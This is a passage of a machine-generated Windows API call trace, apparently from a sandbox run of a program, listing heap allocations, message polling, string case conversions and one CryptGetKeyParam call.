Flags=0x0, Size=0x10) returned 0x889ac0 [0041.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0041.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0041.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.704] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0041.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0041.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0041.704] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0041.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0041.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0041.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0041.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0041.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0041.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0041.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0041.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0041.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0041.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0041.704] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0041.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0041.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0041.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0041.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da368 [0041.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0041.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0041.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0041.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce08 [0041.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0041.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0041.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0041.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0041.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0041.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0041.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0041.705] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0041.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0041.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0041.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0041.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0041.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0041.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0041.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0041.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0041.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0041.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0041.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0041.706] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0041.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0041.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0041.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0041.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0041.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0041.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0041.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0041.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0041.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0041.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0041.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0041.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0041.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0041.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0041.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0041.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0041.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0041.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.707] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0041.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0041.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0041.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0041.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0041.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0041.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0041.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0041.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0041.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0041.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0041.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0041.708] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0041.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0041.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0041.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0041.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0041.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0041.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.708] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0041.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cca0 [0041.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0041.708] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0041.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0041.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0041.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0041.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0041.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0041.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0041.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0041.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0041.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0041.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0041.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0041.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0041.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0041.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0041.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0041.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0041.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0041.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0041.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0041.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0041.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0041.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0041.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0041.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0041.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0041.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0041.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0041.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0041.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0041.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0041.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0041.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0041.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0041.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0041.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0041.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0041.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0041.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0041.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0041.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0041.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0041.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0041.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0041.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0041.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0041.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0041.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0041.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0041.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0041.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0041.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0041.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0041.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.712] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.712] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da328, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da328*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0041.712] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.712] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.712] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0041.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0041.712] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.712] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.712] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.712] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.712] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 